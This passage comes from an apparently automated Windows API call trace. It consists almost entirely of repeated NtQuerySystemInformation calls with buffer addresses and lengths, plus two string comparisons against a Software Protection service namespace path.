Length=0x0, ResultLength=0x0) [0272.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0272.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x28, ResultLength=0x0) [0272.787] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x28, ResultLength=0x0) [0272.798] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0272.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 